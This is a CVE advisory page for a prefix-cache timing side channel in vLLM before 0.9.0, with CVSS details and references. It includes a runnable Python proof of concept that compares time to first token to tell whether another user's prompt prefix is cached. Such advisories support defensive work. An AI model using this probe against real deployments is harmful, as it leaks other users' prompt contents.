CVE-2025-46570
Description
vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt was processed and the PagedAttention mechanism found a matching prefix chunk in the cache, the prefill process sped up, which was reflected in the TTFT (Time to First Token). These timing differences between cache hits and misses are large enough to be observed and exploited as a side channel: by measuring TTFT, an attacker can infer whether a chosen prefix is already cached, and therefore whether another user recently submitted a prompt sharing that prefix. This issue has been patched in version 0.9.0.
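The side channel is straightforward to demonstrate. Below is a minimal sketch, assuming a vulnerable (pre-0.9.0) vLLM deployment serving the OpenAI-compatible streaming completions API locally; the base URL, model name, and prompt strings are illustrative assumptions, not details from the advisory.

```python
import time
import requests

BASE_URL = "http://localhost:8000/v1/completions"  # assumed local vLLM deployment

def time_to_first_token(prompt: str) -> float:
    """Stream a completion and return the time until the first token arrives."""
    payload = {
        "model": "example-model",  # hypothetical model name
        "prompt": prompt,
        "max_tokens": 1,
        "stream": True,
    }
    start = time.monotonic()
    with requests.post(BASE_URL, json=payload, stream=True, timeout=30) as resp:
        resp.raise_for_status()
        for line in resp.iter_lines():
            if line:  # skip SSE keep-alive blank lines
                return time.monotonic() - start
    return float("inf")

# A prompt whose prefix is already in the shared prefix cache prefills faster,
# so its TTFT is measurably lower than that of an uncached prompt.
probe = "Is the following system prompt cached? ..."  # candidate prefix guess
control = "x" * len(probe)                            # same length, unlikely cached
print("probe TTFT:  ", time_to_first_token(probe))
print("control TTFT:", time_to_first_token(control))
```

Repeating each measurement and comparing the latency distributions separates cache hits from misses even with network jitter, which is why the discrepancy is treated as exploitable despite the HIGH attack-complexity rating.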
CVE Details
CVSS v3.1 Score: 2.6
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N
Attack Vector: NETWORK
Complexity: HIGH
Privileges Required: LOW
User Interaction: REQUIRED
Published: 5/29/2025
Last Modified: 6/24/2025
Source: NVD
Honeypot Sightings: 0
Affected Products
vllm:vllm
Weaknesses (CWE)
CWE-208 (Observable Timing Discrepancy), CWE-203 (Observable Discrepancy)
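The assigned weaknesses name the pattern precisely: both CWEs cover operations whose measurable behavior depends on state an observer should not learn. The toy model below, an analogy and not vLLM code, shows how skipping work for each matching prefix chunk makes total latency a function of how much of the input agrees with cached state.

```python
import time

CHUNK = 4  # tokens per cache block in this toy model

def prefill_latency(prompt: list, cached: list) -> float:
    """Return simulated prefill time: matching leading chunks cost nothing."""
    start = time.perf_counter()
    i = 0
    limit = min(len(prompt), len(cached))
    while i + CHUNK <= limit and prompt[i:i + CHUNK] == cached[i:i + CHUNK]:
        i += CHUNK  # cache hit: this chunk's prefill is skipped
    for _ in range(len(prompt) - i):
        time.sleep(0.001)  # stand-in for per-token prefill compute
    return time.perf_counter() - start

cached = list(range(32))
print(prefill_latency(list(range(32)), cached))  # full prefix hit: fast
print(prefill_latency([-1] * 32, cached))        # no hit: slow
```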
References
https://github.com/vllm-project/vllm/commit/77073c77bc2006eb80ea6d5128f076f5e6c6f54f (security-advisories@github.com)
https://github.com/vllm-project/vllm/pull/17045 (security-advisories@github.com)
https://github.com/vllm-project/vllm/security/advisories/GHSA-4qjh-9fv9-r85r (security-advisories@github.com)
IOC Correlations
No correlations recorded
This product uses data from the NVD API but is not endorsed or certified by the NVD.